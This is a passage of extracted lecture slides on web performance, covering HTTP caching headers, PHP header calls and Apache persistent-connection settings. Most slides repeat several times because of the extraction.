I This presentation does not cover setting upa cache. Instead, it focuses on how to useexisting caches, that is browser and proxycaches.
55 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of Caches (Cont’d)
I The web server itself has a cache, seehttpd.apache.org/docs/2.2/caching.html for information oncaching with apache. Although this doesnot reduce network traffic, it might eliminatedatabase calls and PHP execution.
I This presentation does not cover setting upa cache. Instead, it focuses on how to useexisting caches, that is browser and proxycaches.
55 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?
I Caching policies varies, and can also beconfigured manually.
I Following is a (simplification of a) typicalmethod to decide if content shall be servedfrom cache, or if a request to the server isneeded.
56 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?
I Caching policies varies, and can also beconfigured manually.
I Following is a (simplification of a) typicalmethod to decide if content shall be servedfrom cache, or if a request to the server isneeded.
56 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?(Cont’d)
1. Nothing is cached if a do-not-cache responseheader is set.
2. Nothing is cached if https is used.
3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.
4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.
5. Nothing is delivered from cache if bullets 3 and 4 fail.
57 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?(Cont’d)
1. Nothing is cached if a do-not-cache responseheader is set.
2. Nothing is cached if https is used.
3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.
4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.
5. Nothing is delivered from cache if bullets 3 and 4 fail.
57 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?(Cont’d)
1. Nothing is cached if a do-not-cache responseheader is set.
2. Nothing is cached if https is used.
3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.
4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.
5. Nothing is delivered from cache if bullets 3 and 4 fail.
57 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?(Cont’d)
1. Nothing is cached if a do-not-cache responseheader is set.
2. Nothing is cached if https is used.
3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.
4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.
5. Nothing is delivered from cache if bullets 3 and 4 fail.
57 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Loaded From Cache?(Cont’d)
1. Nothing is cached if a do-not-cache responseheader is set.
2. Nothing is cached if https is used.
3. Resource is delivered from cache if originallydelivered from server with an expiry time, and thattime has not passed.
4. If the resource’s expiry time has passed, and theresource was delivered with a last modified time, theserver is asked if the resource is updated. Thismeans the server must be contacted, but it might notbe necessary to transfer the entire resource.
5. Nothing is delivered from cache if bullets 3 and 4 fail.
57 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Control Caches
I HTTP headers are the preferred way toprovide cache control.
I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.
I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.
58 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Control Caches
I HTTP headers are the preferred way toprovide cache control.
I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.
I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.
58 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Control Caches
I HTTP headers are the preferred way toprovide cache control.
I HTML meta tags can also be used, butmany caches do not open the HTMLdocument, and thereby miss them.
I Yet another alternative is Pragma HTTPheaders, but they are not part of the HTTPspecification, and thus often not consideredby caches.
58 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP HeadersSome HTTP headers used for cache control:
I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT
I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT
I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"
59 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP HeadersSome HTTP headers used for cache control:
I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT
I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT
I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"
59 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP HeadersSome HTTP headers used for cache control:
I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT
I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT
I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"
59 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP HeadersSome HTTP headers used for cache control:
I Expires specifies a time in the GMT timezone. After this time, the cache shall checkwith the server if the resource is updated.Expires: Thu, 02 Oct 2014 14:16:41 GMT
I Last-Modified Specifies the timewhen the resource was last modified.Last-Modified: Wed, 01 Oct 2014 08:34:51 GMT
I ETag A unique identifier generated by theserver and changed every time theresource changes.Etag: "a8104f-4c3-504585f9acfcd"
59 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Cache-Related HTTP Headers(Cont’d)
I Cache-Control Can have multiplevalues, for example:
I max-age Specifies how many seconds theresource is considered fresh.
I no-cache Forces caches to submit therequest to the server for validation, beforeserving a cached copy.
I no-store The resource shall never bestored in a cache.
I must-revalidate Caches must obeyExpires and max-age. The HTTPspecification states that these might otherwisebe ignored in some cases.
Cache-Control: max-age=3600, must-revalidate
60 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Set HTTP HeadersI The PHP header function sets HTTP
headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);
I Remember that headers precede content,header must be called before any actualoutput is sent.
I Cache related HTTP headers can be set bythe web server.
I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.
61 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Set HTTP HeadersI The PHP header function sets HTTP
headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);
I Remember that headers precede content,header must be called before any actualoutput is sent.
I Cache related HTTP headers can be set bythe web server.
I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.
61 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Set HTTP HeadersI The PHP header function sets HTTP
headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);
I Remember that headers precede content,header must be called before any actualoutput is sent.
I Cache related HTTP headers can be set bythe web server.
I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.
61 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
How to Set HTTP HeadersI The PHP header function sets HTTP
headers.header(’Expires: Thu, 02 Oct 2014 14:16:41 GMT’);
I Remember that headers precede content,header must be called before any actualoutput is sent.
I Cache related HTTP headers can be set bythe web server.
I This can be configured in the server’sconfiguration file, seehttps://httpd.apache.org/docs/2.2/mod/mod_expires.htmlfor the apache server.
61 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips
I Always use the same URL for the sameresource, since resources are identified byURL.
I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.
I Use a long caching period for images andother resources that seldom change.
I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.
62 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips
I Always use the same URL for the sameresource, since resources are identified byURL.
I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.
I Use a long caching period for images andother resources that seldom change.
I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.
62 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips
I Always use the same URL for the sameresource, since resources are identified byURL.
I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.
I Use a long caching period for images andother resources that seldom change.
I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.
62 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips
I Always use the same URL for the sameresource, since resources are identified byURL.
I Use a shared library of images and otherresources, so a resource is identified withthe same URL as often as possible.
I Use a long caching period for images andother resources that seldom change.
I Cache also resources that change often,but for a short period. Even caching oneminute helps reduce server load.
62 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips (Cont’d)
I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.
I Don’t change files unless really needed,since that will change the last modifiedtimestamp.
I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.
63 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips (Cont’d)
I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.
I Don’t change files unless really needed,since that will change the last modifiedtimestamp.
I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.
63 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Caching Tips (Cont’d)
I When deciding caching periods, considerwhen the cached resource must beupdated, not how often it changes. It mightbe perfectly OK to show an old version for alimited amount of time.
I Don’t change files unless really needed,since that will change the last modifiedtimestamp.
I Output of PHP programs can be cached ifthe output only depends on the URL.Remember to set appropriate headers.
63 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Evaluating Response Headers
I HTTP response headers can be evaluatedat http://redbot.org/. This worksonly for servers with a public IP address.
64 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
65 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Persistent TCP Connections
I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.
I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.
I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.
66 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Persistent TCP Connections
I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.
I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.
I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.
66 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Persistent TCP Connections
I With HTTP 1.1, TCP connections are bydefault reused for multiple HTTP requests.
I This can improve response time andthroughput quite a lot, since it takes time toestablish a new connection.
I To enable this, the content-lengthheader must be set in the HTTP response,otherwise the client can not know when theresponse is delivered and the connection isfree to reuse.
66 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections
I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.
I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.
I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.
67 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections
I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.
I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.
I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.
67 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections
I By default, the Apache 2.2 server usespersistent connections that are closed after15 seconds of inactivity.
I Persistent connections are turned on byspecifying KeepAlive On is theconfiguration file. This is also the defaultvalue.
I The timeout period is configured with theKeepAliveTimeout directive,KeepAliveTimeout 60 specifies thatconnections that are closed after 60seconds of inactivity.
67 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections (Cont’d)
I A longer timeout period normally improvesperformance if there are few concurrentrequests.
I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.
I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.
I Note that this does not limit the number ofopen connections.
68 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections (Cont’d)
I A longer timeout period normally improvesperformance if there are few concurrentrequests.
I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.
I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.
I Note that this does not limit the number ofopen connections.
68 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections (Cont’d)
I A longer timeout period normally improvesperformance if there are few concurrentrequests.
I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.
I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.
I Note that this does not limit the number ofopen connections.
68 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Configuring PersistentConnections (Cont’d)
I A longer timeout period normally improvesperformance if there are few concurrentrequests.
I With many concurrent requests,performance is worsened with a longtimeout, since the server uses too muchresources for all open connections.
I The max number of concurrently servedrequests can be configured with theMaxClients directive, default is 256.
I Note that this does not limit the number ofopen connections.
68 / 68